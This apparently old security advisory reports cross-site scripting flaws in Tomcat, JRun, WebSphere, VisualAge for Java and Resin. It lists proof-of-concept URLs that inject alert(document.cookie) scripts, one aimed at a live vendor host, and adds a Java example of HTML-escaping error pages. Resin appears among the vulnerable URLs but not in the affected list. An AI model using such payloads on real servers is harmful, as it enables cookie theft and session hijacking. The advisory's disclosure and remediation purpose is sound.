Products from a number of vendors contain cross-site scripting vulnerabilities.
Affected products:
===========================================
Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
JRun 3.0
WebSphere 3.5 FP2, 3.02
VisualAge for Java 3.5 Professional
Products not affected: none found.
Vulnerability:
===========================================
With the following URLs, JavaScript code can be executed in the browser in the context of the server's domain.
Tomcat 3.2.1:
    http://Tomcat/JSP-mapped-dir/alert(document.cookie).jsp
JRun 3.0:
    http://jrun/alert(document.cookie).shtml
    http://jrun/alert(document.cookie).jsp
    http://jrun/alert(document.cookie).thtml
WebSphere 3.5 FP2:
    http://WebSphere/WebApp/Examples/alert(document.cookie)
WebSphere 3.02:
    http://WebSphere/alert(document.cookie).jsp
VisualAge for Java 3.5 Professional:
    http://visualage-webSphere-test-environment/alert(document.cookie)
Resin 1.2.2:
    http://resin/alert(document.cookie).jsp
    http://www.caucho.com/document.write(document.cookie).jsp

These pages are displayed as shown below:
===========================================
Error 404
An error has occurred while processing request: http://WebSphere/WebApp/Examples/******
Message: File not found: file://******
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
    at javax.servlet.ServletException.(ServletException.java:107)
    at com.ibm.websphere.servlet.error.ServletErrorReport.(ServletErrorReport.java:31)
    at com.ibm.servlet.engine.webapp.WebAppErrorReport.(WebAppErrorReport.java:20)
    at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
    ...
===========================================
******: the JavaScript code is executed here.

These vulnerabilities are very similar to the cross-site scripting vulnerability in Microsoft IIS published on August 25 last year.
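
The error page shown above copies the requested path into its HTML without encoding it. As an added illustration (not code from this advisory or from any of the listed products), the following Java program renders a "file not found" body both ways; the class name, method names and sample path are constructed for the example.

```java
public class ErrorPageEscaping {

    // HTML-encode the characters that can change markup context.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Behaviour described above: the requested path goes into the page as-is,
    // so markup in the path becomes markup served from the site's own domain.
    static String notFoundPageUnescaped(String requestPath) {
        return "<html><body><h1>Error 404</h1>"
             + "<p>Message: File not found: " + requestPath + "</p></body></html>";
    }

    // Hardened form: the echoed path is encoded, so the browser shows it as text.
    static String notFoundPageEscaped(String requestPath) {
        return "<html><body><h1>Error 404</h1>"
             + "<p>Message: File not found: " + escapeHtml(requestPath) + "</p></body></html>";
    }

    public static void main(String[] args) {
        // Constructed sample request path (already URL-decoded by the container).
        String path = "/WebApp/Examples/<script>alert(document.cookie)</script>";

        String weak = notFoundPageUnescaped(path);
        String safe = notFoundPageEscaped(path);

        System.out.println("unescaped body has a script element: " + weak.contains("<script>"));
        System.out.println("escaped body has a script element:   " + safe.contains("<script>"));
        System.out.println(safe);
    }
}
```

The same encoding has to be applied to every place the page echoes request data, including the "Message" and "StackTrace" lines.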